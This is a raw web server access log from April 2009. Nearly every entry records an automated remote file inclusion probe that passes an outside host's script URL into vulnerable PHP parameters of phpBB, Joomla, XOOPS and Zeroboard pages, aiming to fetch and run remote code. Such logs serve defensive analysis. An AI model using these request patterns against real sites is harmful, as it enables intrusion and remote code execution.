67.205.89.200 - - [28/Apr/2009:09:30:11 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.89.200 - - [28/Apr/2009:09:30:11 -0700] "GET /logs/access_080924.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.89.200 - - [28/Apr/2009:09:30:11 -0700] "GET /logs/access_080512.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.89.200 - - [28/Apr/2009:09:30:11 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:09:30:11 -0700] "GET /errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:09:30:11 -0700] "GET /logs/access_081012.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:09:30:11 -0700] "GET /logs/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.89.200 - - [28/Apr/2009:09:30:11 -0700] "GET /logs/access_080504.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/mametx24/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:09:30:16 -0700] "GET /logs/access_081008.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:30:20 -0700] "GET /logs/phphtml.php?htmlclass_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:30:20 -0700] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:30:20 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:30:20 -0700] "GET /logs/access_081008.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.22.204.84 - - [28/Apr/2009:09:30:30 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/rey.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:30:35 -0700] "GET /errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:30:35 -0700] "GET /logs/access_081012.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:30:35 -0700] "GET /logs/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:30:35 -0700] "GET /errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:30:35 -0700] "GET /logs/access_081012.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:30:35 -0700] "GET /logs/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:30:41 -0700] "GET /logs/access_081008.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:30:41 -0700] "GET /logs/access_081008.log/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:09:30:45 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:09:30:45 -0700] "GET /logs/access_080823.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:09:30:45 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:30:47 -0700] "GET /logs/access_081008.log%20%20/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.185.20.88 - - [28/Apr/2009:09:30:47 -0700] "GET /logs/access_081008.log%20%20/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:09:30:56 -0700] "GET /logs/access_080313.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.89.200 - - [28/Apr/2009:09:31:04 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/mametx24/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.89.200 - - [28/Apr/2009:09:31:04 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/mametx24/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.89.200 - - [28/Apr/2009:09:31:04 -0700] "GET /logs/access_090123.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/mametx24/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.89.200 - - [28/Apr/2009:09:31:09 -0700] "GET /logs/access_080504.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/mametx24/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:09:31:31 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.bandbib.com/web/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.30.81.189 - - [28/Apr/2009:09:31:53 -0700] "GET /logs/access_070717.log HTTP/1.0" 200 2718 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:09:32:19 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:09:32:19 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:09:32:19 -0700] "GET /logs/access_081201.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:09:32:33 -0700] "GET /logs/access_080308.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:32:42 -0700] "GET /logs/access_080819.log%20%20/phphtml.php?htmlclass_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:32:42 -0700] "GET /logs/access_080615.log%20%20/phphtml.php?htmlclass_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:09:32:45 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:09:32:45 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:09:32:45 -0700] "GET /logs/access_090330.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:09:32:48 -0700] "GET /logs/access_080613.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.89.200 - - [28/Apr/2009:09:32:58 -0700] "GET /logs/access_080512.log%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.89.200 - - [28/Apr/2009:09:33:03 -0700] "GET /logs/access_080924.log%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.89.200 - - [28/Apr/2009:09:33:10 -0700] "GET /logs/access_080924.log%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.89.200 - - [28/Apr/2009:09:33:10 -0700] "GET /logs/access_080512.log%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:09:33:25 -0700] "GET /logs/access_090305.log%20%20//index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:33:42 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:33:42 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:33:47 -0700] "GET /logs/access_080421.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:33:48 -0700] "GET /logs/access_080610.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:09:33:58 -0700] "GET /logs/access_080708.log%20%20//index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:33:59 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:33:59 -0700] "GET /logs/access_080421.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:33:59 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:34:01 -0700] "GET /logs/access_080610.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.171.190.110 - - [28/Apr/2009:09:34:21 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
140.112.90.164 - - [28/Apr/2009:09:34:21 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://xpoison.ucoz.ru/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.171.190.110 - - [28/Apr/2009:09:34:22 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.171.190.110 - - [28/Apr/2009:09:34:22 -0700] "GET /logs/access_081201.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.171.190.110 - - [28/Apr/2009:09:34:23 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.171.190.110 - - [28/Apr/2009:09:34:24 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.171.190.110 - - [28/Apr/2009:09:34:24 -0700] "GET /logs/access_081201.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
140.112.90.164 - - [28/Apr/2009:09:34:28 -0700] "GET /logs/access_080207.log/config.php?path_to_root=http://xpoison.ucoz.ru/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:09:35:03 -0700] "GET /logs/access_080823.log%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:35:05 -0700] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:35:05 -0700] "GET /phphtml.php?htmlclass_path=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:35:05 -0700] "GET /logs/phphtml.php?htmlclass_path=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.195.124.11 - - [28/Apr/2009:09:35:13 -0700] "GET /logs/access_080313.log%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.171.190.110 - - [28/Apr/2009:09:35:19 -0700] "GET /logs/access_080308.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:09:35:33 -0700] "GET /logs/access_090127.log//index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.112.152 - - [28/Apr/2009:09:35:41 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:35:48 -0700] "GET /logs/access_080421.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:35:49 -0700] "GET /logs/access_080610.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:35:55 -0700] "GET /logs/access_080421.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:35:55 -0700] "GET /logs/access_080610.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:35:55 -0700] "GET /logs/access_081008.log%20%20/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:09:35:58 -0700] "GET /logs/access_090330.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:09:35:58 -0700] "GET /logs/access_080613.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.129.214.105 - - [28/Apr/2009:09:36:21 -0700] "GET /logs/access_080720.log/?_zb_path=http://www.xn--2w2bi6o99b.net/bbs/skin/zero_vote/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:09:36:26 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
78.129.214.105 - - [28/Apr/2009:09:36:28 -0700] "GET /logs/?_zb_path=http://www.xn--2w2bi6o99b.net/bbs/skin/zero_vote/images/id.txt? HTTP/1.1" 200 97188 "-" "libwww-perl/5.821" "www.dmulk.com"
89.171.190.110 - - [28/Apr/2009:09:36:35 -0700] "GET /logs/access_080308.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:09:36:40 -0700] "GET /logs/access_081008.log%20%20/errors.php?error=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:09:36:41 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:36:47 -0700] "GET /logs/access_081104.log//modules/punish/profile.php?exbb[home_path]=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:36:48 -0700] "GET /modules/punish/profile.php?exbb[home_path]=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:36:48 -0700] "GET /logs//modules/punish/profile.php?exbb[home_path]=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:36:55 -0700] "GET /logs/access_081104.log//modules/punish/profile.php?exbb[home_path]=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:36:55 -0700] "GET /modules/punish/profile.php?exbb[home_path]=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:09:36:56 -0700] "GET /logs//modules/punish/profile.php?exbb[home_path]=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.129.214.105 - - [28/Apr/2009:09:37:00 -0700] "GET /?_zb_path=http://www.xn--2w2bi6o99b.net/bbs/skin/zero_vote/images/id.txt? HTTP/1.1" 500 292 "-" "libwww-perl/5.821" "www.dmulk.com"
64.255.110.42 - - [28/Apr/2009:09:37:24 -0700] "GET /logs/access_080313.log///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.129.214.105 - - [28/Apr/2009:09:37:28 -0700] "GET /logs/access_080925.log/?_zb_path=http://www.xn--2w2bi6o99b.net/bbs/skin/zero_vote/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.dmulk.com"
77.221.130.18 - - [28/Apr/2009:09:37:32 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
77.221.130.18 - - [28/Apr/2009:09:37:32 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
67.205.89.200 - - [28/Apr/2009:09:37:32 -0700] "GET /logs/access_090123.log%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/mametx24/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.89.200 - - [28/Apr/2009:09:37:43 -0700] "GET /logs/access_090123.log%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/mametx24/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.89.200 - - [28/Apr/2009:09:37:52 -0700] "GET /logs/access_080504.log%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/mametx24/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.89.200 - - [28/Apr/2009:09:38:00 -0700] "GET /logs/access_080504.log%20%20/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/mametx24/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.230 - - [28/Apr/2009:09:38:35 -0700] "GET /logs//index.php?opcao=com_easygallery&Itemid=&mosConfig_absolute_path=http://www.abclove.us//technote7/data/member/fx1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.230 - - [28/Apr/2009:09:38:35 -0700] "GET /logs/access_080327.log//index.php?opcao=com_easygallery&Itemid=&mosConfig_absolute_path=http://www.abclove.us//technote7/data/member/fx1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:09:38:37 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
219.240.39.230 - - [28/Apr/2009:09:38:37 -0700] "GET /logs//index.php?opcao=com_easygallery&Itemid=&mosConfig_absolute_path=http://www.abclove.us//technote7/data/member/fx1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:09:38:38 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:09:38:39 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:09:38:39 -0700] "GET /logs/access_081119.log%20%20//skin/zero_vote/ask_password.php?dir=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:09:38:39 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:09:38:40 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
219.240.39.230 - - [28/Apr/2009:09:38:40 -0700] "GET /logs//index.php?opcao=com_easygallery&Itemid=&mosConfig_absolute_path=http://www.abclove.us//technote7/data/member/fx1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.230 - - [28/Apr/2009:09:38:43 -0700] "GET /logs/access_080327.log//index.php?opcao=com_easygallery&Itemid=&mosConfig_absolute_path=http://www.abclove.us//technote7/data/member/fx1?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.240.39.230 - - [28/Apr/2009:09:38:47 -0700] "GET /logs/access_080327.log//index.php?opcao=com_easygallery&Itemid=&mosConfig_absolute_path=http://www.abclove.us//technote7/data/member/fx1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:09:38:51 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
85.18.117.101 - - [28/Apr/2009:09:38:59 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://zonadeclientes.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
